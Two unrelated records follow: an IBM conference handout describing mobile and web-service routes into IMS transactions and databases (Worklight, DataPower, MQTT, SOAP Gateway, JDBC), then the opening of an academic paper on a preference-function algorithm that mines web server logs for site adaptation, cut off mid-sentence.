Enterprise Mobility for IMS Access Ken Blackman – kblackm@us.ibm.com IBM Suzie Wendler – wendler@us.ibm.com IBM Topics - Enterprise Mobility - The IBM Mobile Foundation - IBM Cast Iron - Worklight - IMS Impact - Transactions - Databases Mobile is a significant component of the evolution of computing. Mobile is different: - Transformational business models - Faster lifecycles / more iterative - Requires closer alignment between stakeholders Enterprise Mobility • Evolving trends • 2011 - 850K Android activations per day, over 372M iOS devices sold with 62M alone in Q4, • 2012 – shipment of smartphones and tablets was expected to exceed that of traditional personal computers including laptops • 2013 • Employee smartphones will account for 62% of business-use • 8 out of 10 businesses will support tablet use in the workplace • ... • 2016 - the estimate is that there will be 1 billion+ smart phones in market, 375 million+ tablets • 2020 - By 2020, the number of mobile devices worldwide will exceed 24 billion • Expanding marketplace and explosive growth due to: • Increasing business requirements for enterprise mobile applications or “apps” for mobile device connectivity • Constant introduction of new capabilities that inspire new opportunities • e.g., global positioning system (GPS) functionalities and cameras • Businesses everywhere are now strategically employing enterprise mobile apps to support business objectives. • Industry recognition of the importance of strategically deploying new enterprise mobile apps to support business objectives. Enterprise Mobility... - Mobile Devices provide new end points - Business to Enterprise - productivity tools for employees - Business to Consumer - Customer engagement channels - Consumer to Consumer - Transfer data to/from mobile device Enterprise Mobility • Application types • Native Mobile only Application • Mobile Web access Application • Hybrid Application • Mobile only + Web access Enterprise Mobility … • The Mobile lifecycle • Strong demand by lines of business • Higher expectations of user experience with mobile apps • Lack of best practices guidance on how to deliver mobile applications • More direct involvement from users/stakeholders in design • Native programming models are not portable across devices • Highly fragmented set of mobile devices and platforms • Very large number of configurations of devices, platforms, carriers, etc. to test • Evolution at a much faster pace • More frequent releases and updates for apps with more urgent time-to-market demands Enterprise Mobility Challenges - Changes to the business model - New business opportunities based upon geolocation - Anytime, anywhere business transactions - Importance of social business interactions - Application Development complexity - Multiple device platforms with fragmented Web, native, and hybrid model landscape - Connecting to enterprise back-end services in a secure and scalable manner - Unique mobile requirements (UI, connected/disconnected use, version upgrades, etc.) - Mobile security and management - Protection of privacy and confidential information - Use of client-owned smartphones and tablets - Visibility, Security & Management of mobile platform requirements Enterprise Mobility … • IBM solutions address these needs through architectures and product solutions that • Build and Connect • Build mobile applications that run on multiple devices • Connect to, and run enterprise back-end applications and information systems • Manage and Secure • Manage mobile devices and applications • Secure the mobile business environment • Extend and Transform • Extend existing business capabilities to mobile devices • Transform the business by creating new opportunities Access to IMS - What’s been available - IBM Mobile offerings - What’s new - IBM Mobile foundation - What’s coming - Requirement for enhanced support of mobile applications by implementing WAS Liberty Profile support with integrated REST endpoint, which will enable use of the lightweight data-interchange format JavaScript Object Notation (JSON) - Mobile application development - Target is IMS administration - Mobile enablement for IMS transactions and data Enterprise Mobility ... IBM Mobile Offerings WebSphere Portal Mobile Portal Accelerator Lotus Quickr Lotus Notes Traveler Lotus Sametime Lotus Connections Lotus Mobile Connect Mobile Portal Accelerator LotusLive meetings Lotus Expediter WebSphere Commerce Tivoli Maximo Everyplace Cognos Go! Mobile Cognos BI Cognos Now SPSS IBM Smart Analytics System Rational DOORS Rational Software Architect Rational Modeling communications Applications plugin for RSA Rational TeamConcert Rational SDL Suite Rhapsody Mobile Mashup WebSphere Application Server WebSphere sMashIMS connector WebSphere Presence Server WebSphere XDMS Server WebSphere Telecom Web Services Server Tivoli Network Performance Manager, Tivoli Netcool OMNibus & Network Manager, Tivoli Netcool/Impact, Tivoli Netcool Service Quality Manager Center, Tivoli Netcool Performance Flow Analyzer Tivoli Access Manager Tivoli Federated Identity Mgr Tivoli Security Info & Event Mgr Tivoli Monitoring Tivoli Business Service Mgmt Tivoli Composite Application Mgr Tivoli Service Automation Mgr Tivoli Usage and Acctg Mgr Tivoli Provisioning Manager WebSphere Dynamic Process Edition Telecom Content Pack Lombardi Blueprint Content Manager OnDemand Optim Data Growth Solution for Amdocs Mobile Enterprise Services Rational FocalPoint Rational System Architect Rational Software Architect Rational Modeling Comm Appl plugin for RSA Infosphere Business Glossary SPDE Rational Clear Case Intelliden R-Series DB2, Informix, solidDB Optim, Guardium InfoSphere Foundation Tools Telecom Data Warehouse InfoSphere MDM InfoSphere MDM for PIM ECM / FileNet InfoSphere Streams ILOG WebSphere Telecom Web Services Server Smart Business Dev & Test Cloud Smart Business Storage Cloud Smart Analytics Cloud IBM CloudBurst Enterprise Mobility … - IBM Mobile framework - Connectivity to back-end IMS resources - WebSphere Application Server solutions - *IMS TM Resource Adapter for transactions* - Full capability adapter (JCA connector) - IMS usage experience is mature - Supports connectivity to IMS Connect from any platform on which WAS can run - *IMS Universal Drivers* - Full access to IMS databases Enterprise Mobility … - WAS connectivity to back-end IMS transactions … - WebSphere Optimized Local Adapter (WOLA) - Useful when WAS and IMS are in the same LPAR - *High speed Local Comm function accessible by address spaces outside the WAS z/OS cell* - WAS to IMS transactions uses the OTMA CI - IMS to WAS uses WOLA APIs and ESAF Enterprise Mobility … - WAS connectivity to back-end IMS transactions … - IBM Operational Decision Management (IBM ODM) - Previously WebSphere Operational Decision Management on z/OS (WODM) - Business rules management system (BRMS) and Business events Processor (BEP) - Detects events and event patterns in real-time to enable situational awareness and response of actionable situations - Automates the response of highly variable decisions based on the specific context of a process, transaction, or interaction. - Manages and governs rules-based decision logic separately from application code in order to provide better visibility, understanding, and maintainability compared to traditional application development Enterprise Mobility … - **Business Event Processing** - *Detects* when events or patterns of events occur to notify people or systems to take action - *Decides* business outcome through execution of business rules against available data - **IBM ODM and IMS** Enterprise Mobility … - **DataPower integration to IMS as a Service Provider** (XI50, XI50B, XI50z, XI52, XB60, XB62...) - **Three interfaces to get to IMS transactions:** - **IMS Connect Client** - Access to IMS applications using a DataPower embedded IMSClientConnect handler to IMS - **Connect** - CM1, Sync=none (Firmware 3.6.1) - Support for >32k with LLLL (3.8.0) - CM1, Sync=confirm (3.8.1) - **Soap** - Access to IMS web services via the IMS SOAP Gateway - **MQ Client** - Access to IMS applications using an MQ server on system z and the MQ Bridge for IMS - Newly announced support for IMS Callout and for the IMS Universal Drivers for DB Enterprise Mobility … - **DataPower …** - **Enhanced** capability with Firmware V6.0 (electronic availability 6/28/13) with XI52, XI52 Virtual Edition, XI50B, and XB62 - An “IMS Callout” front-side handler that natively connects to IMS Connect as service consumer Enterprise Mobility … - **DataPower** … - **Enhanced** WS access to IMS DB with Firmware V6.0 (electronic availability 6/28/13) - SOAP or REST call is mapped to a JDBC (DRDA) invocation - Leverages extensive Web Services security and management capabilities of DataPower to more securely expose critical data to the enterprise Enterprise Mobility... • Cognos 10.2 • Facilitates business decisions through the implementation of business intelligence (BI) and financial performance management (FPM) software • Allows decision makers to aggregate data from transaction systems (SAP, Oracle,… and now IMS.) along with other sources across the organization to create a single, integrated business performance management framework • With IMS • Allows IMS data to be integrated into this environment using the IMS Open Database solution and the IMS universal drivers • Using the Cognos generic JDBC driver interface IBM has been investing in the mobile space for more than a decade BUT In April of 2012, IBM announced a new portfolio that expanded IBM's strategy to provide clients with a mobile platform that spans application development, integration, security and management. www-01.ibm.com/support/docview.wss?uid=swg21590856 IBM Mobile Foundation Includes - IBM WebSphere Cast Iron - IBM Endpoint Manager for Mobile Devices - IBM Worklight Plus New Services - IBM Mobile Services Complementary Offerings - IBM solutions for Social Business - IBM Smarter Commerce - IBM Exceptional Web Experience - IBM Rational Collaborative Lifecycle Management IBM Mobile Foundation … • Packaging of several existing IBM tools and the new cross-platform mobile development and integration capabilities of Worklight • A mobile product family that allows organizations to: • Develop HTML5, hybrid and native apps once and deploy to multiple mobile environments without manual porting • Manage and secure network-connected devices, including mobile endpoints • Integrate mobile applications to enterprise systems and cloud services IBM Mobile Foundation … - Supports the development of mobile apps in four ways - Web Apps - Quick and low-cost development effort - Written entirely in HTML5, CSS and JavaScript code - Executed by the mobile browser and therefore cross-platform by default, but less powerful than native apps. - Hybrid Apps (Web) - The app's source code consists of web code executed within a native container that is provided by Worklight and consists of native libraries. - Hybrid Apps (Mix) - The web code is augmented with native language to create unique features and access native APIs that are not yet available via JavaScript, such as AR, NFC and others. - Native Apps - Platform-specific requiring unique expertise and knowledge - Pricey and time consuming to develop but delivers the highest user experience of all approaches. IBM Mobile Foundation … • **WebSphere Cast Iron** *(for IT Departments)* - Hybrid cloud technology that links mobile applications to clouds as well as back-end infrastructure and enterprise resources • **Worklight** *(for developers)* - A set of development and integration tools - Allows developers to write applications and other mobile software just once - *For deployment across Apple iOS, Google Android and Research In Motion's BlackBerry platform* • **IBM Endpoint Manager** *(for administrators)* - Software that spans servers to mobile devices and can carry out critical tasks such as wiping the data and applications off a mobile device when those resources could be at risk - Supports managing all types of endpoints on a network and making them secure IBM WebSphere Cast Iron - Deployed using - A physical appliance (WebSphere DataPower Cast Iron Appliance XH40) - A virtual appliance (WebSphere Cast Iron Hypervisor Edition) - Can be installed on existing servers using virtualization technology - A full cloud service (IBM Cast Iron Cloud) - Supports a variety of secure communication protocols: - HTTPS (HTTP over SSL) - SOAP/HTTP over SSL - Secure FTP (FTP over SSH) and FTPS (FTP over SSL or Implicit FTPS) - Secure Databases (SSL): Supports secure mechanism for database access IBM Worklight - **Apps Development** - Build once. Run anywhere. - Android, iOS, Blackberry, Microsoft, iGoogle, Facebook app, Adobe AIR - Runtime Skins for different resolutions - Standards based language - Application Lifecycle Management - Centralized Build Process - **Security** - Secured offline access - On device encryption of user data - Single sign-on mechanism - SSL encryption - Protection against reverse engineering vulnerabilities - Multi-factor authentication - **Enterprise Integration** - Direct access to back-end systems - Leverage existing SOA services - Server-side caching - Adapters with support for SAP, SOAP, REST, SQL and more - **Application Management** - App distribution - App Version management - Remote disabling apps - Direct Update - Push Notification service management - Analytics and Usage report - **Middleware** - WebSphere Application Server ND - Reliable, Highly Available and Scalable IBM Worklight - Includes Integration Adapters which - Allow the Worklight platform to connect to back-end systems - Retrieve information and Perform actions - Are provided with the product - HTTP adapter (supports REST and SOAP) - Cast Iron Adapter - SQL adapter - Supports data retrieval as either raw or preprocessed Worklight Adapters … - Worklight HTTP Adapter - Works with RESTful and SOAP-based services - Can read structured HTTP sources, for example RSS feeds - Allows sending a GET or POST HTTP request and retrieves data from the response headers and body - Easily customizable with simple server-side JavaScript - Optional server-side filtering - Retrieved data can be in XML, HTML, JSON, or plain text formats Worklight Adapters … - Worklight Cast Iron Adapter - Initiates orchestrations in Cast Iron to retrieve and return data to mobile clients - Takes advantage of Cast Iron implementations Worklight Adapters … - Worklight SQL Adapter - A Worklight® SQL adapter is designed to communicate with any SQL data source - Both plain SQL queries or stored procedures can be used - Supports MySQL, Oracle 11g and DB2® databases - Supports a JDBC connector driver for specific database type must be downloaded separately by the developer and added to the lib\ folder of a Worklight project - E.g., IMS universal driver Tooling (IDEs) - Rational Application Developer 8.5 (RAD) - Includes mobile web development tools for a pure web deployment - For developing applications, include mobile web applications, and deploying to WAS or WebSphere Portal - Programming models include JEE, OSGi, SCA, and Web 2.0 - IBM Worklight Studio 5 (IWS) - Includes tools for “mobile hybrid” development within a multi-channel architecture - For developing apps and deploying to smart phones and tablets - Programming model is HTML5 and JavaScript - *Uses a JavaScript-to-native bridge called Apache Cordova (formerly PhoneGap) so hybrid apps can access device capabilities without having to write in native platform languages* - Multi-channel architecture covers mobile devices, mobile web, desktop web and desktop widgets Enterprise Mobility Workload • Business to systems programmer • Scale using z/cloud and IMS Parallel Sysplex • Event processing for workload and error notification • IMS Monitoring tools • Current IMS security does not change • Just another endpoint IMSPlex – Parallel Server Environment Cloud + Mobile workload support - IMS is a dynamic and configurable platform - Provides standard interfaces to access resources - Does not require application program recompiles even if the IMS release is changed - Does not require application program changes even when the network or db structure changes Accessing IMS Transaction Resources MQ Telemetry Transport - MQTT - Optimized messaging for smart sensors and telemetry devices - Enables intelligent decision-making based on remote real-world events - Supports remote resource management of static or moving assets - MQTT is an open message protocol - Examples of usage includes: Facebook Messenger, iPhone, Android, and Windows apps *Telemetry can be used to extend the enterprise to mobile devices* - Direct device integration into back office - Tiny messaging optimized for resource-constrained devices & gateways (RTUs) - Terse protocol & compact header for fragile & pay-per-byte networks - Advanced device level data buffering - Event-driven publish-and-subscribe delivery of only significant information - Open protocol encourages widespread device enablement - Last Will & Testament for automated handling of device failures or outages http://tinyurl.com/9fyudba Complete your sessions evaluation online at SHARE.org/BostonEval MQ Telemetry Transport – MQTT … - With WebSphere MQ Telemetry, instrumented devices that are located anywhere in the world can connect to each other - And with WebSphere MQ, they can connect to enterprise applications and web services - MQ Telemetry uses the MQTT protocol to send and receive messages between devices or applications and the WebSphere MQ queue manager - From the WebSphere MQ queue manager, messages can be exchanged with other messaging applications - Access to IMS transactions from WMQ - IMS MQ Bridge - IMS Adapter - Other IBM products that have applications and devices that communicate using the MQTT protocol - WebSphere Message Broker - WebSphere Application Server - IBM Operational Decision Management (IBM ODM) [Diagram of MQ Telemetry Transport – MQTT …] Complete your sessions evaluation online at SHARE.org/BostonEval Accessing IMS Transactions – SOAP/HTTP … - WebSphere DataPower - Supports - Access to IMS web services via the IMS SOAP Gateway - Access to IMS applications using an MQ server on system z and the MQ Bridge for IMS - Access to IMS applications using a DataPower embedded IMSClientConnect handler to IMS Connect Accessing IMS Transactions – SOAP/HTTP … - WebSphere Message Broker Connect FROM anywhere, TO anywhere Simple & Easy – to Install, Learn, Develop, Deploy and Manage Visually Map and Transform between any two message or file formats http://tinyurl.com/9fyudba Complete your sessions evaluation online at SHARE.org/BostonEval Accessing IMS Transactions – SOAP/HTTP ... - WebSphere Message Broker … - A powerful broker solution driven by business rules - Messages are formed, routed, and transformed according to the rules that you define - Allows diverse applications to exchange information in dissimilar forms - With brokers handling the processing required for the information to arrive in the right place in the correct format - The applications do not need to know anything except their own conventions and requirements. - Implementation of an enterprise service bus architecture - Nodes - Communication points to external resources - Points in the message flow which define a set of actions Accessing IMS Transactions – SOAP/HTTP … - WebSphere Message Broker … - Provides two nodes to access IMS - MQ Node - Takes advantage of the WMQ support - MQPUT / MQGET - IMSRequest Node - Takes advantage of the IMS TM Resource adapter - Accesses IMS through IMS Connect - Delivered/built into WMB - Supports WMB Configurable Services which allow operational control of IMS connection configuration - Supports a broad range of IMS facilities - MPP, BMP and FP transaction regions - Commit mode 0, 1 - SyncLevel NONE, CONFIRM - Single and multi segment IMS messages IMS Connect and IMS TM (Supports Mobile Devices) Accessing IMS Transactions – SOAP/HTTP • Enterprise Mobility means more transactions • Using communication mechanisms and interfaces that are already there for IMS • SOAP/HTTP adapters in Worklight or through Cast Iron • Can send messages to IMS through • IMS ES Soap Gateway • WebSphere Application Server • WebSphere DataPower • WebSphere Message Broker • … Accessing IMS Transactions – SOAP/HTTP ... - IMS Enterprise Suite Soap Gateway - A web services solution that enables IMS applications to interoperate outside of the IMS environment - Compliant with the industry standards for web services, including SOAP/HTTP 1.1 and Web Services Description Language (WSDL) 1.1. - By using the Worklight Server’s HTTP/SOAP adapter, Mobile applications can interoperate with the IMS environment Accessing IMS Transactions – SOAP/HTTP … - WebSphere solutions - Take advantage of the IMS TM Resource Adapter - Based on J2EE Connector Architecture (JCA) 1.5 - Leverages existing IMS assets in an SOA environment - Supports development of applications that can submit transactions to IMS Transaction Manager through IMS Connect Modernize MFS based IMS transaction - Business values offered by IMS MFS on demand - Embedded command-line tooling - 3270 emulator and VTAM are no longer required - Render displays for web browser and mobile devices, e.g. iPhone, iPad, etc. - Modernize MFS transaction without modifying existing applications. Modern device (including mobile) supporting web browser IMS MFS Web Enablement IMS MFS Web Enablement llzzIVTNO DISPLAY LAST1 IMS Assembler program IMS COBOL program llzzIVTNO DISPLAY LAST1 FIRST1 6-111-2222DC2/BG2 ENTRY WAS DISPLAYED Complete your sessions evaluation online at SHARE.org/BostonEval Accessing IMS Transactions – IMS MFS WE - Style sheet is used to transform a MFS XML document into dynamic HTML pages that render data on mobile browser. - MFS XML Utility is a tool that generates XMI files based on MFS source file. It also generates a WAR file for deploying to WebSphere Application Server. - IMS MFS Adapter translates MFS XML document into a byte stream that IMS application can understand. Examples – IMS MFS WE - A demo showing access to IMS MFS transaction from the web browser on a mobile device IMS Application Event notification Asynchronous callout IMS Initiating Client IMS App 1 ISRT ALTPCB Request IMS Connect Hold Q OTMA IMS App 2 Response OTMA Descriptor ISRT ALTPCB -> Asynchronous Synchronous callout IMS Initiating Client IMS App ICAL IMS Connect OTMA ICAL -> Synchronous OTMA Descriptor IBM Mobile Foundation Mobile Device How About Data? IMS Connect and IMS DB (Supports Mobile Devices) IBM Worklight SQL Adapter - Development Studio - A Worklight® SQL adapter is designed to communicate with any SQL data source - Both plain SQL queries or stored procedures can be used - IMS Universal JDBC connector driver can be to the lib\ folder - Access IMS DB via Type 4 Connectivity Worklight Sample screen shots Examples - Access to IMS data from a mobile device
{"Source-Url": "https://share.confex.com/share/121/webprogram/Handout/Session13990/Share13990_IMSEnterpriseMobility.pdf", "len_cl100k_base": 5182, "olmocr-version": "0.1.50", "pdf-total-pages": 53, "total-fallback-pages": 0, "total-input-tokens": 82126, "total-output-tokens": 7413, "length": "2e12", "weborganizer": {"__label__adult": 0.00075531005859375, "__label__art_design": 0.0004856586456298828, "__label__crime_law": 0.0004782676696777344, "__label__education_jobs": 0.0020732879638671875, "__label__entertainment": 0.0002428293228149414, "__label__fashion_beauty": 0.0003857612609863281, "__label__finance_business": 0.0189208984375, "__label__food_dining": 0.00043272972106933594, "__label__games": 0.0014486312866210938, "__label__hardware": 0.06732177734375, "__label__health": 0.0006670951843261719, "__label__history": 0.0004019737243652344, "__label__home_hobbies": 0.0001913309097290039, "__label__industrial": 0.0027027130126953125, "__label__literature": 0.0002440214157104492, "__label__politics": 0.000263214111328125, "__label__religion": 0.0004665851593017578, "__label__science_tech": 0.11383056640625, "__label__social_life": 8.118152618408203e-05, "__label__software": 0.1722412109375, "__label__software_dev": 0.61328125, "__label__sports_fitness": 0.0005984306335449219, "__label__transportation": 0.00235748291015625, "__label__travel": 0.0003261566162109375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 24490, 0.00788]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 24490, 0.05817]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 24490, 0.82402]], "google_gemma-3-12b-it_contains_pii": [[0, 114, false], [114, 250, null], [250, 458, null], [458, 1611, null], [1611, 1868, null], [1868, 2032, null], [2032, 2645, null], [2645, 3547, null], [3547, 4079, null], [4079, 4560, null], [4560, 6330, null], [6330, 6759, null], [6759, 7254, null], [7254, 8001, null], [8001, 8375, null], [8375, 9130, null], [9130, 9399, null], [9399, 9737, null], [9737, 10331, null], [10331, 10648, null], [10648, 10972, null], [10972, 11448, null], [11448, 12289, null], [12289, 13076, null], [13076, 13628, null], [13628, 14609, null], [14609, 14951, null], [14951, 15378, null], [15378, 15570, null], [15570, 16005, null], [16005, 16822, null], [16822, 17085, null], [17085, 17431, null], [17431, 17467, null], [17467, 18428, null], [18428, 19348, null], [19348, 19673, null], [19673, 20003, null], [20003, 20702, null], [20702, 21323, null], [21323, 21372, null], [21372, 21758, null], [21758, 22196, null], [22196, 22540, null], [22540, 23168, null], [23168, 23580, null], [23580, 23690, null], [23690, 24047, null], [24047, 24063, null], [24063, 24112, null], [24112, 24409, null], [24409, 24439, null], [24439, 24490, null]], "google_gemma-3-12b-it_is_public_document": [[0, 114, true], [114, 250, null], [250, 458, null], [458, 1611, null], [1611, 1868, null], [1868, 2032, null], [2032, 2645, null], [2645, 3547, null], [3547, 4079, null], [4079, 4560, null], [4560, 6330, null], [6330, 6759, null], [6759, 7254, null], [7254, 8001, null], [8001, 8375, null], [8375, 9130, null], [9130, 9399, null], [9399, 9737, null], [9737, 10331, null], [10331, 10648, null], [10648, 10972, null], [10972, 11448, null], [11448, 12289, null], [12289, 13076, null], [13076, 13628, null], [13628, 14609, null], [14609, 14951, null], [14951, 15378, null], [15378, 15570, null], [15570, 16005, null], [16005, 16822, null], [16822, 17085, null], [17085, 17431, null], [17431, 17467, null], [17467, 18428, null], [18428, 19348, null], [19348, 19673, null], [19673, 20003, null], [20003, 20702, null], [20702, 21323, null], [21323, 21372, null], [21372, 21758, null], [21758, 22196, null], [22196, 22540, null], [22540, 23168, null], [23168, 23580, null], [23580, 23690, null], [23690, 24047, null], [24047, 24063, null], [24063, 24112, null], [24112, 24409, null], [24409, 24439, null], [24439, 24490, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 24490, null]], "pdf_page_numbers": [[0, 114, 1], [114, 250, 2], [250, 458, 3], [458, 1611, 4], [1611, 1868, 5], [1868, 2032, 6], [2032, 2645, 7], [2645, 3547, 8], [3547, 4079, 9], [4079, 4560, 10], [4560, 6330, 11], [6330, 6759, 12], [6759, 7254, 13], [7254, 8001, 14], [8001, 8375, 15], [8375, 9130, 16], [9130, 9399, 17], [9399, 9737, 18], [9737, 10331, 19], [10331, 10648, 20], [10648, 10972, 21], [10972, 11448, 22], [11448, 12289, 23], [12289, 13076, 24], [13076, 13628, 25], [13628, 14609, 26], [14609, 14951, 27], [14951, 15378, 28], [15378, 15570, 29], [15570, 16005, 30], [16005, 16822, 31], [16822, 17085, 32], [17085, 17431, 33], [17431, 17467, 34], [17467, 18428, 35], [18428, 19348, 36], [19348, 19673, 37], [19673, 20003, 38], [20003, 20702, 39], [20702, 21323, 40], [21323, 21372, 41], [21372, 21758, 42], [21758, 22196, 43], [22196, 22540, 44], [22540, 23168, 45], [23168, 23580, 46], [23580, 23690, 47], [23690, 24047, 48], [24047, 24063, 49], [24063, 24112, 50], [24112, 24409, 51], [24409, 24439, 52], [24439, 24490, 53]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 24490, 0.0]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
fc0ff3b8ba281caf6fb976d7b8eefd0f60babd82
AN EFFICIENT APPROACH FOR WEB-SITE ADAPTATION Seema Jani, Sam Makki Department of Electrical Engineering and Computer Science University of Toledo, Toledo, Ohio, USA Xiaohua Jia Department of Computer Science City University of Hong Kong, Kowloon, Hong Kong Keywords: Web personalization, Data mining, Graph, Probability, Clustering Abstract: This paper implements a novel approach defined as the Preference-function Algorithm (PFA) for web-site adaptation. The algorithm extracts future preferences from the users’ past web navigational activities. Server web logs are used to identify users’ navigation behaviours by examining the traverses of various web pages. In this approach, the sessions are modeled as a finite state graph, where each visited web page is defined as a state. Then, traversing among various states provides the framework for determining the interest of the users. 1 INTRODUCTION The continuous growth of the World Wide Web poses many challenging issues for a person using it. Most Web structures are large and complicated and users often miss the goal of their inquiry, or receive ambiguous results when they try to navigate through the web pages (Eirinaki et al., 2003). The business environment is such that in order to do well it is important to meet the needs of the customers and also create revenue by doing so. Therefore, the need to retain the attention of the users of a web-site and understand the needs of those users leads to the importance of analyzing the users’ behaviour. Once the behavior of the users is known, a company can use this information for a variety of objectives and actions such as, to personalize the web-site, make recommendations, enhance the web-site and target advertise. The objective of a Web personalization system is to “provide users with information they want or need, without expecting them to ask for it explicitly” (Mulvenna et al., 2000). Personalizing a web-site can be done in various ways. One way is to have the information provided by the users via questionnaires, surveys or registration forms. Another is to use demographic, geographic, or psychographic profiles or other information to divide or segment large populations into smaller groups. The last is to seek to understand the behavioral preferences of a specific, individual user and then deliver web-site content specifically targeted at that person. This is known as web usage mining (Eirinaki et al., 2003) and is the one that this paper targets. This method is more dynamic in nature and specifically takes into account the navigational tendencies of the user within a specific web-site. Web usage mining can be regarded as a three-phase process, consisting of the data preparation, pattern discovery, and pattern analysis phases (Srivastava et al., 2000). In the first phase, Web server log data is processed in order to identify users, sessions, pages viewed and so on. The first phase, or data preparation phase, is one of the most time-consuming, but technically straightforward tasks. In the second phase, methods such as those in the area of Statistics or Artificial Intelligence are applied to detect interesting patterns. The second phase is the most diverse and expanding of all three phases and has been the subject of continuing research and advancement. In the third phase of the Web usage mining process, these patterns are stored so that they can be further analyzed and applied. One main area of application is web-site adaptation, where information obtained from phase two is used in conjunction with specific web page relationships and actions. The relationships and actions are determined and provided by the owners of the website. 2 RELATED RESEARCH Pattern analysis in the context of Web usage mining has been the subject of numerous research projects. Two distinct directions are, in general, considered in Web usage mining research: Statistics and Artificial Intelligence techniques. The first approach using Statistics consists of a range of applications from overall analysis to an adapted version of statistical data mining techniques (Srivastava et al., 2000). These data mining techniques are those that mine for rules using the pre-defined support and confidence values. The second approach uses Artificial Intelligence techniques which draw upon methods and algorithms developed from machine learning and pattern recognition (Srivastava et al., 2000). 2.1 Statistical Mining Techniques The research and application of statistical techniques in the analysis of web usage data is a wide area. Three specific research areas are covered in this section. These are the overall statistics of the web usage data, probability analysis and standard data mining techniques. Statistical techniques are the most common method to extract knowledge about the users of a website. There are different levels of analysis which have been used from the area of Statistics in web mining. One general area is the use of overall statistical information, which is given by some software programs. Several commercial software packages such as Analog (Analog, 2004) and OLAP (The OLAP Report, 2005) are available for web log analysis. One more statistical approach which has been taken in the past research is the use of probability in the form of Markov chain modeling (Borges, 2004). Another well-known area of Statistics which has been used in the area of Web usage mining is the use of data mining techniques. These techniques involve finding association rules within a set of data and mining by determining the rules based on the rules’ confidence and support (Agrawal et al., 1994). One example of work done in this area is with the application of the “a priori” algorithm, in which the association rule mining searches for relationships between the items in the data. 2.2 Artificial Intelligence Techniques The second type of technique involves the use of Artificial Intelligence techniques such as clustering and classification. Clustering and classification are machine learning techniques that are used to group together a set of items having similar characteristics. In the Web Usage domain, there are two kinds of interesting clusters to be discovered: page clusters and usage clusters. Clustering of pages discovers groups of pages having related content. Clustering of users, however, tends to establish groups of users exhibiting similar browsing patterns. Classification is the task of mapping a data item into one of several predefined classes. Classification is done by using supervised inductive learning algorithms such as decision tree classifiers, naïve Bayes classifiers, k-nearest neighbor classifiers, Support Vector Machines, etc. Mobasher (Mobasher et al., 1999) modeled the profile based on the clustering approach and named it PACT, which stands for Profile Aggregations based on Clustering Transactions. The goal is to effectively capture common usage patterns from potentially anonymous click-stream data. The data is preprocessed and then used to create the profile. Preprocessing of the data is done in two steps: identifying users and determining pageviews. First, unique users are identified from the anonymous usage data. Erroneous or redundant pageviews are removed from the data. Second, pageviews are identified. Pageview identification is the task of determining which page file accesses contribute to a single browse display. Relevant pageviews are included in transaction files and weights are assigned to reflect the significance of the pageview. The clustering approach however requires that the structure of the web-site to be known. Classification is also used to determine the user preferences (Baglioni et al., 2003). Classification algorithms require training data as input. In this example, the input is a set of cases whereby each case specifies values for a collection of attributes and for a class. The output of the classification algorithm is a model that describes or predicts the class value of a case on the basis of the values of the attributes of the case. The predictive accuracy of the extracted model is evaluated on a test set for which the actual class is known. This method requires registered users to provide information about themselves. The registered users’ information is broken up whereby 67% become the training set and 33% become the test set. The attributes of a class consist of the site pages or sections visited by the user and the class consists of the user’s sex. In this case the goal is to accurately determine the user’s sex based on the web pages that a user visited. The classification accuracy of this approach is 54.8%. The major drawback is the information about the users which has to be obtained ahead of time. 3 OVERALL PROPOSAL To extract the related information from the users’ log, we use a new approach called the Preference-function Algorithm. The Preference-function consists of two components defined as the Likeness-factor and the Time-factor. The Likeness-factor provides an overall idea as to whether or not a particular web page has been visited frequently by the user. The Time-factor provides the overall interest of that web page. These two components are further elaborated upon in the next few sections. Also in this approach, knowledge of the structure of the web-site is not required because this knowledge will be gained from the user’s specific actions. The overall process is divided into two steps as shown in Figures 1 and 2. ![Figure 1: Step 1 in Preference-function Web Mining](image) In step 1, the user profile will be determined by first preprocessing the data, which is also known as data preparation, and then the specific usage mining will be performed using the Preference-function. The data preparation consists of creating useful information from the log files. Nevertheless should mention that, log files may contain many entries that are irrelevant or redundant for the mining task. Initially, the raw data is cleaned which includes removing all redundant or unnecessary information. All information relating to image files and map files, which exist in the log files, is irrelevant to identifying the user’s behavior. Then, the sessions and transactions are identified based on the available data. For our experiment we consider a session length of a 6 hour period and will start when the first page is requested from a designated web-site. The end of the session will be determined when the user leaves the web-site, or when the time on one web page has exceeded 30 minutes. The 30 minute timeout assumption is based on the results from Catledge and Pitkow (Catledge et. al., 1995). Various transactions can occur during each session. Individual entries for page accesses are grouped into meaningful transactions. The transactions are first defined as being unique and are grouped together based on the IP addresses, since any access from different IP addresses is identified as a different transaction. In step 2, as shown in Figure 2, involves making recommendations based on a company-provided scenario. In the case of this experiment, the web-site owner will include suggested actions in the scenario. ![Figure 2: Step 2 in Preference-function Web Mining](image) 3.1 Preference-function (PF) Because the topology of the web-site is not known, information on the server log will provide a way to reconstruct a partial topology. The following assumptions will provide a framework for analyzing the server logs: - A session is to start when the first page of a designated web-site is requested from any IP address. - The beginning of a user session is determined to be the first time a unique IP address is observed. - The end of the session will be determined when the user has left the web-site or when a timeout of 30 minutes has been exceeded on one web page. - Each unique IP address will be compared with those that share the same operating system. - Previously visited web pages are allowed. Relevant information will be extracted from the server logs and combined to form a 